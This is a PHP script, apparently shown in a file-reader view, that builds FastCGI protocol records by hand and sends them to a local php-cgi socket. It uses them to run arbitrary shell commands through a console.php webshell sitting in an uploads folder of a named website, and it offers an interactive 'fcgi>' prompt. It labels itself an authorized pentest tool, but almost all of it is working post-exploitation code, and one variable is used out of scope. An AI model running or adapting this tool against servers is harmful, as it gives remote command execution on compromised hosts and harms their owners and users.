📖 File Reader
<?php
// FastCGI client to execute commands via php-cgi socket - authorized pentest tool
// Target: /www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php
function send_fcgi_request($socket, $requestId, $scriptFile, $cmd) {
// FCGI_BEGIN_REQUEST (type 1)
$beginRequest = pack('CCnnCa*', 1, 1, $requestId, 8, 0, pack('NN', 0, 1)); // FCGI_RESPONDER role
fwrite($socket, $beginRequest);
// FCGI_PARAMS records
$params = [
'REQUEST_METHOD' => 'GET',
'SCRIPT_FILENAME' => $scriptFile,
'SCRIPT_NAME' => '/console.php',
'REQUEST_URI' => '/console.php?cmd=' . urlencode($cmd),
'DOCUMENT_ROOT' => '/www/wwwroot/hljrlsj.com/public',
'SERVER_SOFTWARE' => 'php-fcgi',
'REMOTE_ADDR' => '127.0.0.1',
'REMOTE_PORT' => '12345',
'SERVER_ADDR' => '127.0.0.1',
'SERVER_PORT' => '80',
'SERVER_PROTOCOL' => 'HTTP/1.1',
'CONTENT_TYPE' => '',
'CONTENT_LENGTH' => '0'
];
foreach ($params as $name => $value) {
$nameLen = strlen($name);
$valueLen = strlen($value);
$nameLenByte = $nameLen < 128 ? chr($nameLen) : chr(128 | ($nameLen >> 24)) . pack('N', $nameLen);
$valueLenByte = $valueLen < 128 ? chr($valueLen) : chr(128 | ($valueLen >> 24)) . pack('N', $valueLen);
$paramData = $nameLenByte . $valueLenByte . $name . $value;
$contentLen = strlen($paramData);
$paddingLen = (8 - ($contentLen % 8)) % 8;
$header = pack('CCnnC', 1, 4, $requestId, $contentLen, $paddingLen); // FCGI_PARAMS
fwrite($socket, $header . $paramData . str_repeat("\0", $paddingLen));
}
// Empty FCGI_PARAMS terminator
$header = pack('CCnnC', 1, 4, $requestId, 0, 0);
fwrite($socket, $header);
// FCGI_STDIN with 0 length terminator
$header = pack('CCnnC', 1, 5, $requestId, 0, 0); // FCGI_STDIN
fwrite($socket, $header);
}
function exec_cmd_via_fcgi($cmd) {
$socketPath = '/tmp/php-cgi-73.sock';
$scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
$socket = @stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
if (!$socket) {
die("Failed to connect to FastCGI socket: $errstr ($errno)\n");
}
stream_set_timeout($socket, 10);
send_fcgi_request($socket, 1, $scriptFile, $cmd);
$output = '';
while (!feof($socket)) {
$data = fread($socket, 8192);
if ($data === false || $data === '') break;
$output .= $data;
}
fclose($socket);
// Extract STDOUT content (skip headers)
if (preg_match('/<body[^>]*>(.*)<\/body>/is', $output, $matches)) {
return trim($matches[1]);
}
return trim($output);
}
// Interactive shell
echo "FastCGI Command Execution Shell (via console.php)\n";
echo "Socket: $socketPath | Target: console.php\n\n";
while (true) {
echo "fcgi> ";
$cmd = trim(fgets(STDIN));
if ($cmd === 'exit' || $cmd === 'quit') break;
if (empty($cmd)) continue;
$result = exec_cmd_via_fcgi($cmd);
echo $result . "\n\n";
}
?>